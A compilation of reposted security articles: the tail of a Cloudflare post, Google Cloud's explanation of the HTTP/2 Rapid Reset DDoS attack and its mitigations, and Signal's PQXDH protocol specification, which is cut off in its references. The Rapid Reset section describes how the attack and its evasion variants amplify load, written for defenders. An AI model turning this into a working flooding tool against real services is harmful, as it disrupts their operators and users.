Another front on which we are making change is observability. Returning errors to clients without being visible in customer analytics is unsatisfactory. Fortunately, a project has been underway to overhaul these systems since long before the recent attacks. It will eventually allow each service within our infrastructure to log its own data, instead of relying on our business logic proxy to consolidate and emit log data. This incident underscored the importance of this work, and we are redoubling our efforts.

We are also working on better connection-level logging, allowing us to spot such protocol abuses much more quickly to improve our DDoS mitigation capabilities.

Conclusion

While this was the latest record-breaking attack, we know it won’t be the last. As attacks continue to become more sophisticated, Cloudflare works relentlessly to proactively identify new threats — deploying countermeasures to our global network so that our millions of customers are immediately and automatically protected.

Cloudflare has provided free, unmetered and unlimited DDoS protection to all of our customers since 2017. In addition, we offer a range of additional security features to suit the needs of organizations of all sizes. Contact us if you’re unsure whether you’re protected or want to understand how you can be.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/

How it works: The novel HTTP/2 ‘Rapid Reset’ DDoS attack

October 10, 2023

Juho Snellman
Staff Software Engineer

Daniele Iamartino
Staff Site Reliability Engineer

A number of Google services and Cloud customers have been targeted with a novel HTTP/2-based DDoS attack which peaked in August. These attacks were significantly larger than any previously-reported Layer 7 attacks, with the largest attack surpassing 398 million requests per second.

The attacks were largely stopped at the edge of our network by Google’s global load balancing infrastructure and did not lead to any outages. While the impact was minimal, Google’s DDoS Response Team reviewed the attacks and added additional protections to further mitigate similar attacks. In addition to Google’s internal response, we helped lead a coordinated disclosure process with industry partners to address the new HTTP/2 vector across the ecosystem.

Hear monthly from our Cloud CISO in your inbox

Get security updates, musings, and more from Google Cloud CISO Phil Venables direct to your inbox every month.

Subscribe today

https://storage.googleapis.com/gweb-cloudblog-publish/images/gcat_small_1.max-300x168.jpg

Below, we explain the predominant methodology for Layer 7 attacks over the last few years, what changed in these new attacks to make them so much larger, and the mitigation strategies we believe are effective against this attack type. This article is written from the perspective of a reverse proxy architecture, where the HTTP request is terminated by a reverse proxy that forwards requests to other services. The same concepts apply to HTTP servers that are integrated into the application server, but with slightly different considerations which potentially lead to different mitigation strategies.

A primer on HTTP/2 for DDoS

Since late 2021, the majority of Layer 7 DDoS attacks we’ve observed across Google first-party services and Google Cloud projects protected by Cloud Armor have been based on HTTP/2, both by number of attacks and by peak request rates.

A primary design goal of HTTP/2 was efficiency, and unfortunately the features that make HTTP/2 more efficient for legitimate clients can also be used to make DDoS attacks more efficient.

Stream multiplexing

HTTP/2 uses “streams”, bidirectional abstractions used to transmit various messages, or “frames”, between the endpoints. “Stream multiplexing” is the core HTTP/2 feature which allows higher utilization of each TCP connection. Streams are multiplexed in a way that can be tracked by both sides of the connection while only using one Layer 4 connection. Stream multiplexing enables clients to have multiple in-flight requests without managing multiple individual connections.

One of the main constraints when mounting a Layer 7 DoS attack is the number of concurrent transport connections. Each connection carries a cost, including operating system memory for socket records and buffers, CPU time for the TLS handshake, as well as each connection needing a unique four-tuple, the IP address and port pair for each side of the connection, constraining the number of concurrent connections between two IP addresses.

In HTTP/1.1, each request is processed serially. The server will read a request, process it, write a response, and only then read and process the next request. In practice, this means that the rate of requests that can be sent over a single connection is one request per round trip, where a round trip includes the network latency, proxy processing time and backend request processing time. While HTTP/1.1 pipelining is available in some clients and servers to increase a connection’s throughput, it is not prevalent amongst legitimate clients.

With HTTP/2, the client can open multiple concurrent streams on a single TCP connection, each stream corresponding to one HTTP request. The maximum number of concurrent open streams is, in theory, controllable by the server, but in practice clients may open 100 streams per request and the servers process these requests in parallel. It’s important to note that server limits can not be unilaterally adjusted.

For example, the client can open 100 streams and send a request on each of them in a single round trip; the proxy will read and process each stream serially, but the requests to the backend servers can again be parallelized. The client can then open new streams as it receives responses to the previous ones. This gives an effective throughput for a single connection of 100 requests per round trip, with similar round trip timing constants to HTTP/1.1 requests. This will typically lead to almost 100 times higher utilization of each connection.

The HTTP/2 Rapid Reset attack

The HTTP/2 protocol allows clients to indicate to the server that a previous stream should be canceled by sending a RST_STREAM frame. The protocol does not require the client and server to coordinate the cancellation in any way, the client may do it unilaterally. The client may also assume that the cancellation will take effect immediately when the server receives the RST_STREAM frame, before any other data from that TCP connection is processed.

This attack is called Rapid Reset because it relies on the ability for an endpoint to send a RST_STREAM frame immediately after sending a request frame, which makes the other endpoint start working and then rapidly resets the request. The request is canceled, but leaves the HTTP/2 connection open.

https://storage.googleapis.com/gweb-cloudblog-publish/images/2023_worlds_largest_rapid_reset_diagram.max-1616x909.png

HTTP/1.1 and HTTP/2 request and response pattern

The HTTP/2 Rapid Reset attack built on this capability is simple: The client opens a large number of streams at once as in the standard HTTP/2 attack, but rather than waiting for a response to each request stream from the server or proxy, the client cancels each request immediately.

The ability to reset streams immediately allows each connection to have an indefinite number of requests in flight. By explicitly canceling the requests, the attacker never exceeds the limit on the number of concurrent open streams. The number of in-flight requests is no longer dependent on the round-trip time (RTT), but only on the available network bandwidth.

In a typical HTTP/2 server implementation, the server will still have to do significant amounts of work for canceled requests, such as allocating new stream data structures, parsing the query and doing header decompression, and mapping the URL to a resource. For reverse proxy implementations, the request may be proxied to the backend server before the RST_STREAM frame is processed. The client on the other hand paid almost no costs for sending the requests. This creates an exploitable cost asymmetry between the server and the client.

Another advantage the attacker gains is that the explicit cancellation of requests immediately after creation means that a reverse proxy server won’t send a response to any of the requests. Canceling the requests before a response is written reduces downlink (server/proxy to attacker) bandwidth.

HTTP/2 Rapid Reset attack variants

In the weeks after the initial DDoS attacks, we have seen some Rapid Reset attack variants. These variants are generally not as efficient as the initial version was, but might still be more efficient than standard HTTP/2 DDoS attacks.

The first variant does not immediately cancel the streams, but instead opens a batch of streams at once, waits for some time, and then cancels those streams and then immediately opens another large batch of new streams. This attack may bypass mitigations that are based on just the rate of inbound RST_STREAM frames (such as allow at most 100 RST_STREAMs per second on a connection before closing it).

These attacks lose the main advantage of the canceling attacks by not maximizing connection utilization, but still have some implementation efficiencies over standard HTTP/2 DDoS attacks. But this variant does mean that any mitigation based on rate-limiting stream cancellations should set fairly strict limits to be effective.

The second variant does away with canceling streams entirely, and instead optimistically tries to open more concurrent streams than the server advertised. The benefit of this approach over the standard HTTP/2 DDoS attack is that the client can keep the request pipeline full at all times, and eliminate client-proxy RTT as a bottleneck. It can also eliminate the proxy-server RTT as a bottleneck if the request is to a resource that the HTTP/2 server responds to immediately.

RFC 9113, the current HTTP/2 RFC, suggests that an attempt to open too many streams should invalidate only the streams that exceeded the limit, not the entire connection. We believe that most HTTP/2 servers will not process those streams, and is what enables the non-cancelling attack variant by almost immediately accepting and processing a new stream after responding to a previous stream.

A multifaceted approach to mitigations

We don’t expect that simply blocking individual requests is a viable mitigation against this class of attacks — instead the entire TCP connection needs to be closed when abuse is detected. HTTP/2 provides built-in support for closing connections, using the GOAWAY frame type. The RFC defines a process for gracefully closing a connection that involves first sending an informational GOAWAY that does not set a limit on opening new streams, and one round trip later sending another that forbids opening additional streams.

However, this graceful GOAWAY process is usually not implemented in a way which is robust against malicious clients. This form of mitigation leaves the connection vulnerable to Rapid Reset attacks for too long, and should not be used for building mitigations as it does not stop the inbound requests. Instead, the GOAWAY should be set up to limit stream creation immediately.

This leaves the question of deciding which connections are abusive. The client canceling requests is not inherently abusive, the feature exists in the HTTP/2 protocol to help better manage request processing. Typical situations are when a browser no longer needs a resource it had requested due to the user navigating away from the page, or applications using a long polling approach with a client-side timeout.

Mitigations for this attack vector can take multiple forms, but mostly center around tracking connection statistics and using various signals and business logic to determine how useful each connection is. For example, if a connection has more than 100 requests with more than 50% of the given requests canceled, it could be a candidate for a mitigation response. The magnitude and type of response depends on the risk to each platform, but responses can range from forceful GOAWAY frames as discussed before to closing the TCP connection immediately.

To mitigate against the non-cancelling variant of this attack, we recommend that HTTP/2 servers should close connections that exceed the concurrent stream limit. This can be either immediately or after some small number of repeat offenses.

Applicability to other protocols

We do not believe these attack methods translate directly to HTTP/3 (QUIC) due to protocol differences, and Google does not currently see HTTP/3 used as a DDoS attack vector at scale. Despite that, our recommendation is for HTTP/3 server implementations to proactively implement mechanisms to limit the amount of work done by a single transport connection, similar to the HTTP/2 mitigations discussed above.

Industry coordination

Early in our DDoS Response Team’s investigation and in coordination with industry partners, it was apparent that this new attack type could have a broad impact on any entity offering the HTTP/2 protocol for their services. Google helped lead a coordinated vulnerability disclosure process taking advantage of a pre-existing coordinated vulnerability disclosure group, which has been used for a number of other efforts in the past.

During the disclosure process, the team focused on notifying large-scale implementers of HTTP/2 including infrastructure companies and server software providers. The goal of these prior notifications was to develop and prepare mitigations for a coordinated release. In the past, this approach has enabled widespread protections to be enabled for service providers or available via software updates for many packages and solutions.

During the coordinated disclosure process, we reserved CVE-2023-44487 to track fixes to the various HTTP/2 implementations.

Next steps

The novel attacks discussed in this post can have significant impact on services of any scale. All providers who have HTTP/2 services should assess their exposure to this issue. Software patches and updates for common web servers and programming languages may be available to apply now or in the near future. We recommend applying those fixes as soon as possible.

For our customers, we recommend patching software and enabling the Application Load Balancer and Google Cloud Armor, which has been protecting Google and existing Google Cloud Application Load Balancing users.

Source :
https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack

The PQXDH Key Agreement Protocol

Revision 1, 2023-05-24 [PDF]

Ehren Kret, Rolfe Schmidt

Table of Contents

1. Introduction

This document describes the “PQXDH” (or “Post-Quantum Extended Diffie-Hellman”) key agreement protocol. PQXDH establishes a shared secret key between two parties who mutually authenticate each other based on public keys. PQXDH provides post-quantum forward secrecy and a form of cryptographic deniability but still relies on the hardness of the discrete log problem for mutual authentication in this revision of the protocol.

PQXDH is designed for asynchronous settings where one user (“Bob”) is offline but has published some information to a server. Another user (“Alice”) wants to use that information to send encrypted data to Bob, and also establish a shared secret key for future communication.

2. Preliminaries

2.1. PQXDH parameters

An application using PQXDH must decide on several parameters:

NameDefinition
curveA Montgomery curve for which XEdDSA [1] is specified, at present this is one of curve25519 or curve448
hashA 256 or 512-bit hash function (e.g. SHA-256 or SHA-512)
infoAn ASCII string identifying the application with a minimum length of 8 bytes
pqkemA post-quantum key encapsulation mechanism (e.g. Crystals-Kyber-1024 [2])
EncodeECA function that encodes a curve public key into a byte sequence
DecodeECA function that decodes a byte sequence into a curve public key and is the inverse of EncodeEC
EncodeKEMA function that encodes a pqkem public key into a byte sequence
DecodeKEMA function that decodes a byte sequence into a pqkem public key and is the inverse of EncodeKEM

For example, an application could choose curve as curve25519, hash as SHA-512, info as “MyProtocol”, and pqkem as CRYSTALS-KYBER-1024.

The recommended implementation of EncodeEC consists of a single-byte constant representation of curve followed by little-endian encoding of the u-coordinate as specified in [3]. The single-byte representation of curve is defined by the implementer. Similarly the recommended implementation of DecodeEC reads the first byte to determine the parameter curve. If the first byte does not represent a recognized curve, the function fails. Otherwise it applies the little-endian decoding of the u-coordinate for curve as specified in [3].

The recommended implementation of EncodeKEM consists of a single-byte constant representation of pqkem followed by the encoding of PQKPK specified by pqkem. The single-byte representation of pqkem is defined by the implementer. Similarly the recommended implementation of DecodeKEM reads the first byte to determine the parameter pqkem. If the first byte does not represent a recognized key encapsulation mechanism, the function fails. Otherwise it applies the decoding specified by the selected key encapsulation mechanism.

2.2. Cryptographic notation

Throughout this document, all public keys have a corresponding private key, but to simplify descriptions we will identify key pairs by the public key and assume that the corresponding private key can be accessed by the key owner.

This document will use the following notation:

  • The concatenation of byte sequences X and Y is X || Y.
  • DH(PK1, PK2) represents a byte sequence which is the shared secret output from an Elliptic Curve Diffie-Hellman function involving the key pairs represented by public keys PK1 and PK2. The Elliptic Curve Diffie-Hellman function will be either the X25519 or X448 function from [3], depending on the curve parameter.
  • Sig(PK, M, Z) represents the byte sequence that is a curve XEdDSA signature on the byte sequence M which was created by signing M with PK’s corresponding private key and using 64 bytes of randomness Z. This signature verifies with public key PK. The signing and verification functions for XEdDSA are specified in [1].
  • KDF(KM) represents 32 bytes of output from the HKDF algorithm [4] using hash with inputs:
    • HKDF input key material = F || KM, where KM is an input byte sequence containing secret key material, and F is a byte sequence containing 32 0xFF bytes if curve is curve25519, and 57 0xFF bytes if curve is curve448. As in in XEdDSA [1]F ensures that the first bits of the HKDF input key material are never a valid encoding of a scalar or elliptic curve point.
    • HKDF salt = A zero-filled byte sequence with length equal to the hash output length, in bytes.
    • HKDF info = The concatenation of string representations of the 4 PQXDH parameters infocurvehash, and pqkem into a single string separated with ‘_’ such as “MyProtocol_CURVE25519_SHA-512_CRYSTALS-KYBER-1024”. The string representations of the PQXDH parameters are defined by the implementer.
  • (CT, SS) = PQKEM-ENC(PK) represents a tuple of the byte sequence that is the KEM ciphertext, CT, output by the algorithm pqkem together with the shared secret byte sequence SS encapsulated by the ciphertext using the public key PK.
  • PQKEM-DEC(PK, CT) represents the shared secret byte sequence SS decapsulated from a pqkem ciphertext using the private key counterpart of the public key PK used to encapsulate the ciphertext CT.

2.3. Roles

The PQXDH protocol involves three parties: AliceBob, and a server.

  • Alice wants to send Bob some initial data using encryption, and also establish a shared secret key which may be used for bidirectional communication.
  • Bob wants to allow parties like Alice to establish a shared key with him and send encrypted data. However, Bob might be offline when Alice attempts to do this. To enable this, Bob has a relationship with some server.
  • The server can store messages from Alice to Bob which Bob can later retrieve. The server also lets Bob publish some data which the server will provide to parties like Alice. The amount of trust placed in the server is discussed in Section 4.9.

In some systems the server role might be divided between multiple entities, but for simplicity we assume a single server that provides the above functions for Alice and Bob.

2.4. Elliptic Curve Keys

PQXDH uses the following elliptic curve public keys:

NameDefinition
IKAAlice’s identity key
IKBBob’s identity key
EKAAlice’s ephemeral key
SPKBBob’s signed prekey
(OPKB1OPKB2, …)Bob’s set of one-time prekeys

The elliptic curve public keys used within a PQXDH protocol run must either all be in curve25519 form, or they must all be in curve448 form, depending on the curve parameter [3].

Each party has a long-term identity elliptic curve public key (IKA for Alice, IKB for Bob).

Bob also has a signed prekey SPKB, which he changes periodically and signs each time with IKB, and a set of one-time prekeys (OPKB1OPKB2, …), which are each used in a single PQXDH protocol run. (“Prekeys” are so named because they are essentially protocol messages which Bob publishes to the server prior to Alice beginning the protocol run.) These keys will be uploaded to the server as described in Section 3.2.

During each protocol run, Alice generates a new ephemeral key pair with public key EKA.

2.5. Post-Quantum Key Encapsulation Keys

PQXDH uses the following post-quantum key encapsulation public keys:

NameDefinition
PQSPKBBob’s signed last-resort pqkem prekey
(PQOPKB1PQOPKB2, …)Bob’s set of signed one-time pqkem prekeys

The pqkem public keys used within a PQXDH protocol run must all use the same pqkem parameter.

Bob has a signed last-resort post-quantum prekey PQSPKB, which he changes periodically and signs each time with IKB, and a set of signed one-time prekeys (PQOPKB1PQOPKB2, …) which are also signed with IKB and each used in a single PQXDH protocol run. These keys will be uploaded to the server as described in Section 3.2. The name “last-resort” refers to the fact that the last-resort prekey is only used when one-time pqkem prekeys are not available. This can happen when the number of prekey bundles downloaded for Bob exceeds the number of one-time pqkem prekeys Bob has uploaded (see Section 3 for details about the role of the server).

3. The PQXDH protocol

3.1. Overview

PQXDH has three phases:

  1. Bob publishes his elliptic curve identity key, elliptic curve prekeys, and pqkem prekeys to a server.
  2. Alice fetches a “prekey bundle” from the server, and uses it to send an initial message to Bob.
  3. Bob receives and processes Alice’s initial message.

The following sections explain these phases.

3.2. Publishing keys

Bob generates a sequence of 64-byte random values ZSPK, ZPQSPK, Z1, Z2, … and publishes a set of keys to the server containing:

  • Bob’s curve identity key IKB
  • Bob’s signed curve prekey SPKB
  • Bob’s signature on the curve prekey Sig(IKB, EncodeEC(SPKB), ZSPK)
  • Bob’s signed last-resort pqkem prekey PQSPKB
  • Bob’s signature on the pqkem prekey Sig(IKB, EncodeKEM(PQSPKB), ZPQSPK)
  • A set of Bob’s one-time curve prekeys (OPKB1, OPKB2, OPKB3, …)
  • A set of Bob’s signed one-time pqkem prekeys (PQOPKB1, PQOPKB2, PQOPKB3, …)
  • The set of Bob’s signatures on the signed one-time pqkem prekeys (Sig(IKB, EncodeKEM(PQOPKB1), Z1), Sig(IKB, EncodeKEM(PQOPKB2), Z2), Sig(IKB, EncodeKEM(PQOPKB3), Z3), …)

Bob only needs to upload his identity key to the server once. However, Bob may upload new one-time prekeys at other times (e.g. when the server informs Bob that the server’s store of one-time prekeys is getting low).

For both the signed curve prekey and the signed last-resort pqkem prekey, Bob will upload a new prekey along with its signature using IKB at some interval (e.g. once a week or once a month). The new signed prekey and its signatures will replace the previous values.

After uploading a new pair of signed curve and signed last-resort pqkem prekeys, Bob may keep the private key corresponding to the previous pair around for some period of time to handle messages using it that may have been delayed in transit. Eventually, Bob should delete this private key for forward secrecy (one-time prekey private keys will be deleted as Bob receives messages using them; see Section 3.4).

3.3. Sending the initial message

To perform a PQXDH key agreement with Bob, Alice contacts the server and fetches a “prekey bundle” containing the following values:

  • Bob’s curve identity key IKB
  • Bob’s signed curve prekey SPKB
  • Bob’s signature on the curve prekey Sig(IKB, EncodeEC(SPKB), ZSPK)
  • One of either Bob’s signed one-time pqkem prekey PQOPKBn or Bob’s last-resort signed pqkem prekey PQSPKB if no signed one-time pqkem prekey remains. Call this key PQPKB.
  • Bob’s signature on the pqkem prekey Sig(IKB, EncodeKEM(PQPKB), ZPQPK)
  • (Optionally) Bob’s one-time curve prekey OPKBn

The server should provide one of Bob’s curve one-time prekeys if one exists and then delete it. If all of Bob’s curve one-time prekeys on the server have been deleted, the bundle will not contain a one-time curve prekey element.

The server should prefer to provide one of Bob’s pqkem one-time signed prekeys PQOPKBn if one exists and then delete it. If all of Bob’s pqkem one-time signed prekeys on the server have been deleted, the bundle will instead contain Bob’s pqkem last-resort signed prekey PQSPKB.

Alice verifies the signatures on the prekeys. If any signature check fails, Alice aborts the protocol. Otherwise, if all signature checks pass, Alice then generates an ephemeral curve key pair with public key EKA. Alice additionally generates a pqkem encapsulated shared secret:

    (CT, SS) = PQKEM-ENC(PQPKB)
               shared secret SS
               ciphertext CT

If the bundle does not contain a curve one-time prekey, she calculates:

    DH1 = DH(IKA, SPKB)
    DH2 = DH(EKA, IKB)
    DH3 = DH(EKA, SPKB)
    SK = KDF(DH1 || DH2 || DH3 || SS)

If the bundle does contain a curve one-time prekey, the calculation is modified to include an additional DH:

    DH4 = DH(EKA, OPKB)
    SK = KDF(DH1 || DH2 || DH3 || DH4 || SS)

After calculating SK, Alice deletes her ephemeral private key, the DH outputs, the shared secret SS, and the ciphertext CT.

Alice then calculates an “associated data” byte sequence AD that contains identity information for both parties:

    AD = EncodeEC(IKA) || EncodeEC(IKB)

Alice may optionally append additional information to AD, such as Alice and Bob’s usernames, certificates, or other identifying information.

Alice then sends Bob an initial message containing:

  • Alice’s identity key IKA
  • Alice’s ephemeral key EKA
  • The pqkem ciphertext CT encapsulating SS for PQPKB
  • Identifiers stating which of Bob’s prekeys Alice used
  • An initial ciphertext encrypted with some AEAD encryption scheme [5] using AD as associated data and using an encryption key which is either SK or the output from some cryptographic PRF keyed by SK.

The initial ciphertext is typically the first message in some post-PQXDH communication protocol. In other words, this ciphertext typically has two roles, serving as the first message within some post-PQXDH protocol, and as part of Alice’s PQXDH initial message.

The initial message must be encoded in an unambiguous format to avoid confusion of the message items by the recipient.

After sending this, Alice may continue using SK or keys derived from SK within the post-PQXDH protocol for communication with Bob, subject to the security considerations discussed in Section 4.

3.4. Receiving the initial message

Upon receiving Alice’s initial message, Bob retrieves Alice’s identity key and ephemeral key from the message. Bob also loads his identity private key and the private key(s) corresponding to the signed prekeys and one-time prekeys Alice used.

Using these keys, Bob calculates PQKEM-DEC(PQPKB, CT) as the shared secret SS and repeats the DH and KDF calculations from the previous section to derive SK, and then deletes the DH values and SS values.

Bob then constructs the AD byte sequence using IKA and IKB as described in the previous section. Finally, Bob attempts to decrypt the initial ciphertext using SK and AD. If the initial ciphertext fails to decrypt, then Bob aborts the protocol and deletes SK.

If the initial ciphertext decrypts successfully, the protocol is complete for Bob. For forward secrecy, Bob deletes the ciphertext and any one-time prekey private key that was used. Bob may then continue using SK or keys derived from SK within the post-PQXDH protocol for communication with Alice subject to the security considerations discussed in Section 4.

4. Security considerations

The security of the composition of X3DH [6] with the Double Ratchet [7] was formally studied in [8] and proven secure under the Gap Diffie-Hellman assumption (GDH)[9]. PQXDH composed with the Double Ratchet retains this security against an adversary without access to a quantum computer, but strengthens the security of the initial handshake to require the solution of both GDH and Module-LWE [10]. The remainder of this section discusses an incomplete list of further security considerations.

4.1. Authentication

Before or after a PQXDH key agreement, the parties may compare their identity public keys IKA and IKB through some authenticated channel. For example, they may compare public key fingerprints manually, or by scanning a QR code. Methods for doing this are outside the scope of this document.

Authentication in PQXDH is not quantum-secure. In the presence of an active quantum adversary, the parties receive no cryptographic guarantees as to who they are communicating with. Post-quantum secure deniable mutual authentication is an open research problem which we hope to address with a future revision of this protocol.

If authentication is not performed, the parties receive no cryptographic guarantee as to who they are communicating with.

4.2. Protocol replay

If Alice’s initial message doesn’t use a one-time prekey, it may be replayed to Bob and he will accept it. This could cause Bob to think Alice had sent him the same message (or messages) repeatedly.

To mitigate this, a post-PQXDH protocol may wish to quickly negotiate a new encryption key for Alice based on fresh random input from Bob. This is the typical behavior of Diffie-Hellman-based ratcheting protocols [7].

Bob could attempt other mitigations, such as maintaining a blacklist of observed messages, or replacing old signed prekeys more rapidly. Analyzing these mitigations is beyond the scope of this document.

4.3. Replay and key reuse

Another consequence of the replays discussed in the previous section is that a successfully replayed initial message would cause Bob to derive the same SK in different protocol runs.

For this reason, any post-PQXDH protocol that uses SK to derive encryption keys MUST take measures to prevent catastrophic key reuse. For example, Bob could use a DH-based ratcheting protocol to combine SK with a freshly generated DH output to get a randomized encryption key [7].

4.4. Deniability

Informally, cryptographic deniability means that a protocol neither gives its participants a publishable cryptographic proof of the contents of their communication nor proof of the fact that they communicated. PQXDH, like X3DH, aims to provide both Alice and Bob deniablilty that they communicated with each other in a context where a “judge” who may have access to one or more party’s secret keys is presented with a transcript allegedly created by communication between Alice and Bob.

We focus on offline deniability because if either party is collaborating with a third party during protocol execution, they will be able to provide proof of their communication to such a third party. This limitation on “online” deniability appears to be intrinsic to the asynchronous setting [11].

PQXDH has some forms of cryptographic deniability. Motivated by the goals of X3DH, Brendel et al. [12] introduce a notion of 1-out-of-2 deniability for semi-honest parties and a “big brother” judge with access to all parties’ secret keys. Since either Alice or Bob can create a fake transcript using only their own secret keys, PQXDH has this deniability property. Vatandas, et al. [13] prove that X3DH is deniable in a different sense subject to certain “Knowledge of Diffie-Hellman Assumptions”. PQXDH is deniable in this sense for Alice, subject to the same assumptions, and we conjecture that it is deniable for Bob subject to an additional Plaintext Awareness (PA) assumption for pqkem. We note that Kyber uses a variant of the Fujisaki-Okamoto transform with implicit rejection [14] and is therefore not PA as is. However, in PQXDH, an AEAD ciphertext encrypted with the session key is always sent along with the Kyber ciphertext. This should offer the same guarantees as PA. We encourage the community to investigate the precise deniability properties of PQXDH.

These assertions all pertain to deniability in the classical setting. As discussed in [15] we expect that for future revisions of this protocol (that provide post-quantum mutual authentication) assertions about deniability against semi-honest quantum advsersaries will hold. Deniability in the face of malicious quantum adversaries requires further research.

4.5. Signatures

It might be tempting to omit the prekey signature after observing that mutual authentication and forward secrecy are achieved by the DH calculations. However, this would allow a “weak forward secrecy” attack: A malicious server could provide Alice a prekey bundle with forged prekeys, and later compromise Bob’s IKB to calculate SK.

Alternatively, it might be tempting to replace the DH-based mutual authentication (i.e. DH1 and DH2) with signatures from the identity keys. However, this reduces deniability, increases the size of initial messages, and increases the damage done if ephemeral or prekey private keys are compromised, or if the signature scheme is broken.

4.6. Key compromise

Compromise of a party’s private keys has a disastrous effect on security, though the use of ephemeral keys and prekeys provides some mitigation.

Compromise of a party’s identity private key allows impersonation of that party to others. Compromise of a party’s prekey private keys may affect the security of older or newer SK values, depending on many considerations.

A full analysis of all possible compromise scenarios is outside the scope of this document, however a partial analysis of some plausible scenarios is below:

  • If either an elliptic curve one-time prekey (OPKB) or a post-quantum key encapsulation one-time prekey (PQOPKB) are used for a protocol run and deleted as specified, then a compromise of Bob’s identity key and prekey private keys at some future time will not compromise the older SK.
  • If one-time prekeys were not used for a protocol run, then a compromise of the private keys for IKBSPKB, and PQSPKB from that protocol run would compromise the SK that was calculated earlier. Frequent replacement of signed prekeys mitigates this, as does using a post-PQXDH ratcheting protocol which rapidly replaces SK with new keys to provide fresh forward secrecy [7].
  • Compromise of prekey private keys may enable attacks that extend into the future, such as passive calculation of SK values, and impersonation of arbitrary other parties to the compromised party (“key-compromise impersonation”). These attacks are possible until the compromised party replaces his compromised prekeys on the server (in the case of passive attack); or deletes his compromised signed prekey’s private key (in the case of key-compromise impersonation).

4.7. Passive quantum adversaries

PQXDH is designed to prevent “harvest now, decrypt later” attacks by adversaries with access to a quantum computer capable of computing discrete logarithms in curve.

  • If an attacker has recorded the public information and the message from Alice to Bob, even access to a quantum computer will not compromise SK.
  • If a post-quantum key encapsulation one-time prekey (PQOPKB) is used for a protocol run and deleted as specified then compromise after deletion and access to a quantum computer at some future time will not compromise the older SK.
  • If post-quantum one-time prekeys were not used for a protocol run, then access to a quantum computer and a compromise of the private key for PQSPKB from that protocol run would compromise the SK that was calculated earlier. Frequent replacement of signed prekeys mitigates this, as does using a post-PQXDH ratcheting protocol which rapidly replaces SK with new keys to provide fresh forward secrecy [7].

4.8. Active quantum adversaries

PQXDH is not designed to provide protection against active quantum attackers. An active attacker with access to a quantum computer capable of computing discrete logarithms in curve can compute DH(PK1, PK2) and Sig(PK, M, Z) for all elliptic curve keys PK1PK2, and PK. This allows an attacker to impersonate Alice by using the quantum computer to compute the secret key corresponding to PKA then continuing with the protocol. A malicious server with access to such a quantum computer could impersonate Bob by generating new key pairs PQSPK’B and PQOPK’B, computing the secret key corresponding to PKB, then using PKB to sign the newly generated post-quantum KEM keys and delivering these attacker-generated keys in place of Bob’s post-quantum KEM key when Alice requests a prekey bundle.

It is tempting to consider adding a post-quantum identity key that Bob could use to sign the post-quantum prekeys. This would prevent the malicious server attack described above and provide Alice a cryptographic guarantee that she is communicating with Bob, but it does not provide mutual authentication. Bob does not have any cryptographic guarantee about who he is communicating with. The post-quantum KEM and signature schemes being standardized by NIST [16] do not provide a mechanism for post-quantum deniable mutual authentication, although this can be achieved through the use of a post-quantum ring signature or designated verifier signature [12][15]. We urge the community to work toward standardization of these or other mechanisms that will allow deniable mutual authentication.

4.9. Server trust

A malicious server could cause communication between Alice and Bob to fail (e.g. by refusing to deliver messages).

If Alice and Bob authenticate each other as in Section 4.1, then the only additional attack available to the server is to refuse to hand out one-time prekeys, causing forward secrecy for SK to depend on the signed prekey’s lifetime (as analyzed in Section 4.6).

This reduction in initial forward secrecy could also happen if one party maliciously drains another party’s one-time prekeys, so the server should attempt to prevent this (e.g. with rate limits on fetching prekey bundles).

4.10. Identity binding

Authentication as in Section 4.1 does not necessarily prevent an “identity misbinding” or “unknown key share” attack.

This results when an attacker (“Charlie”) falsely presents Bob’s identity key fingerprint to Alice as his (Charlie’s) own, and then either forwards Alice’s initial message to Bob, or falsely presents Bob’s contact information as his own. The effect of this is that Alice thinks she is sending an initial message to Charlie when she is actually sending it to Bob.

To make this more difficult the parties can include more identifying information into AD, or hash more identifying information into the fingerprint, such as usernames, phone numbers, real names, or other identifying information. Charlie would be forced to lie about these additional values, which might be difficult.

However, there is no way to reliably prevent Charlie from lying about additional values, and including more identity information into the protocol often brings trade-offs in terms of privacy, flexibility, and user interface. A detailed analysis of these trade-offs is beyond the scope of this document.

4.11. Risks of weak randomness sources

In addition to concerns about the generation of the keys themselves, the security of the PQKEM shared secret relies on the random source available to Alice’s machine at the time of running the PQKEM-ENC operation. This leads to a situation similar to what we face with a Diffie-Hellman exchange. For both Diffie-Hellman and Kyber, if Alice has weak entropy then the resulting shared secret will have low entropy when conditioned on Bob’s public key. Thus both the classical and post-quantum security of SK depend on the strength of Alice’s random source.

Kyber hashes Bob’s public key with Alice’s random bits to generate the shared secret, making Bob’s key contributory, as it is with a Diffie-Hellman key exchange. This does not reduce the dependence on Alice’s entropy source, as described above, but it does limit Alice’s ability to control the post-quantum shared secret. Not all KEMs make Bob’s key contributory and this is a property to consider when selecting pqkem.

5. IPR

This document is hereby placed in the public domain.

6. Acknowledgements

The PQXDH protocol was developed by Ehren Kret and Rolfe Schmidt as an extension of the X3DH protocol [6] by Moxie Marlinspike and Trevor Perrin. Thanks to Trevor Perrin for discussions on the design of this protocol.

Thanks to Bas Westerbaan, Chris Peikert, Daniel Collins, Deirdre Connolly, John Schanck, Jon Millican, Jordan Rose, Karthik Bhargavan, Loïs Huguenin-Dumittan, Peter Schwabe, Rune Fiedler, Shuichi Katsumata, Sofía Celi, and Yo’av Rieck for helpful discussions and editorial feedback.

Thanks to the Kyber team [17] for their work on the Kyber key encapsulation mechanism.

7. References

[1]

T. Perrin, “The XEdDSA and VXEdDSA Signature Schemes,” 2016. https://signal.org/docs/specifications/xeddsa/

[2]

“Module-lattice-based key-encapsulation mechanism standard.” https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.203.ipd.pdf

[3]

A. Langley, M. Hamburg, and S. Turner, “Elliptic Curves for Security.” Internet Engineering Task Force; RFC 7748 (Informational); IETF, Jan-2016. http://www.ietf.org/rfc/rfc7748.txt

[4]

H. Krawczyk and P. Eronen, “HMAC-based Extract-and-Expand Key Derivation Function (HKDF).” Internet Engineering Task Force; RFC 5869 (Informational); IETF, May-2010. http://www.ietf.org/rfc/rfc5869.txt

[5]

